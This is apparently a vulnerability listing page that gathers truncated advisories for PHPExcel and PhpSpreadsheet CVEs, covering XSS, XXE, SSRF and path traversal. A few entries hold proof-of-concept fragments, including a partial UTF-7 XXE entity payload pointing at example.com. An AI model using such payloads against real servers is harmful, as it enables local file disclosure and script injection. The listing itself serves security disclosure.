Phpoffice Phpexcel vulnerabilities

CVE-2025-23210 [MEDIUM] CWE-79 PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters **Product:** PhpSpreadsheet **Version:** 3.8.0 **CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) **CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L

CVE-2025-22131 [MEDIUM] CWE-79 Cross-Site Scripting (XSS) vulnerability in generateNavigation() function in PhpSpreadsheet Cross-Site Scripting (XSS) vulnerability in generateNavigation() function in PhpSpreadsheet ### Summary The researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability in the code which translates the XLSX file into a HTML representation and displays it in the response. ### Details When generating the HTML from an xlsx file containing multiple she

CVE-2024-56366 [HIGH] CWE-79 PhpSpreadsheet allows unauthorized Reflected XSS in the Accounting.php file PhpSpreadsheet allows unauthorized Reflected XSS in the Accounting.php file # Unauthorized Reflected XSS in the `Accounting.php` file **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) **CVSS vector v.4.0**: 8.3 (AV:N/A

CVE-2024-56365 [HIGH] CWE-79 PhpSpreadsheet allows unauthorized Reflected XSS in the constructor of the Downloader class PhpSpreadsheet allows unauthorized Reflected XSS in the constructor of the Downloader class # Unauthorized Reflected XSS in the constructor of the `Downloader` class **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U

CVE-2024-56408 [HIGH] CWE-79 PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file PhpSpreadsheet allows unauthorized Reflected XSS in `Convert-Online.php` file # Unauthorized Reflected XSS in `Convert-Online.php` file **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) **CVSS vector v.4.0**: 8.3 (AV:

CVE-2024-56409 [HIGH] CWE-79 PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file # Unauthorized Reflected XSS in `Currency.php` file **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) **CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A

CVE-2024-56411 [MEDIUM] CWE-79 PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header # Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **

CVE-2024-56410 [MEDIUM] CWE-79 PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability in custom properties PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability in custom properties # Cross-Site Scripting (XSS) vulnerability in custom properties **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) **CVSS vecto

CVE-2024-56412 [MEDIUM] CWE-79 PhpSpreadsheet allows bypass XSS sanitizer using the javascript protocol and special characters PhpSpreadsheet allows bypass XSS sanitizer using the javascript protocol and special characters # Bypass XSS sanitizer using the javascript protocol and special characters **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 5.4 (AV:N/AC:L/P

CVE-2024-47873 [HIGH] CWE-611 XmlScanner bypass leads to XXE XmlScanner bypass leads to XXE ### Summary The [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks. However, the regexes used in th

CVE-2024-48917 [HIGH] CWE-611 XXE in PHPSpreadsheet's XLSX reader XXE in PHPSpreadsheet's XLSX reader ### Summary The [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks. However, we found an

CVE-2015-3542 [HIGH] CWE-611 PHPExcel XXE Vulnerability PHPExcel XXE Vulnerability PHPExcel XXE Vulnerability

CVE-2024-45293 [HIGH] CWE-611 XXE in PHPSpreadsheet's XLSX reader XXE in PHPSpreadsheet's XLSX reader ### Summary The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white-spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files and sensitive information can be disclosed by providing a crafted sheet. ### Details The security scan function in `src/PhpSpreadsheet/Reader/

CVE-2024-45290 [HIGH] CWE-36 PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery when opening XLSX file PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery when opening XLSX file ### Summary It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially craf

CVE-2024-45292 [MEDIUM] CWE-79 PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via JavaScript hyperlinks PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via JavaScript hyperlinks ### Summary `\PhpOffice\PhpSpreadsheet\Writer\Html` does not sanitize "javascript:" URLs from hyperlink `href` attributes, resulting in a Cross-Site Scripting vulnerability. ### PoC Example target script: ``` load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadsheet\Wri

CVE-2024-45060 [MEDIUM] CWE-79 PhpSpreadsheet has an Unauthenticated Cross-Site-Scripting (XSS) in sample file PhpSpreadsheet has an Unauthenticated Cross-Site-Scripting (XSS) in sample file ### Summary One of the sample scripts in PhpSpreadsheet is susceptible to a cross-site scripting (XSS) vulnerability due to improper handling of input where a number is expected leading to formula injection. ### Details The following [code](https://github.com/PHPOffice/PhpSpreadsheet/blob/d50b8b5de7e30439

CVE-2024-45291 [MEDIUM] CWE-22 PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery in HTML writer when embedding images is enabled PhpSpreadsheet allows absolute path traversal and Server-Side Request Forgery in HTML writer when embedding images is enabled ### Summary It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with `$writer->setEmbedImages(true);` those files wil

CVE-2024-45048 [HIGH] CWE-611 XXE in PHPSpreadsheet encoding is returned XXE in PHPSpreadsheet encoding is returned ### Summary Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) ### Details Check ` $pattern = '/encoding="(.*?)"/';` easy to bypass. Just use a single quote symbol `'`. So payload looks like this: ``` +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/fil

CVE-2024-45046 [MEDIUM] CWE-79 PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information ### Summary `\PhpOffice\PhpSpreadsheet\Writer\Html` doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page. ### PoC Example target script: ``` load(__DIR__ . '/book.xlsx'); $writer = new \PhpOffice\PhpSpreadshee

CVE-2014-2054 [MEDIUM] CWE-611 PHPExcel vulnerable to XXE attacks through libxml PHPExcel vulnerable to XXE attacks through libxml PHPExcel before 1.8.0, as used in ownCloud Server before 5.0.15 and 6.0.x before 6.0.2, does not disable external entity loading in libxml, which allows remote attackers to read arbitrary files, cause a denial of service, or possibly have other impact via an XML External Entity (XXE) attack.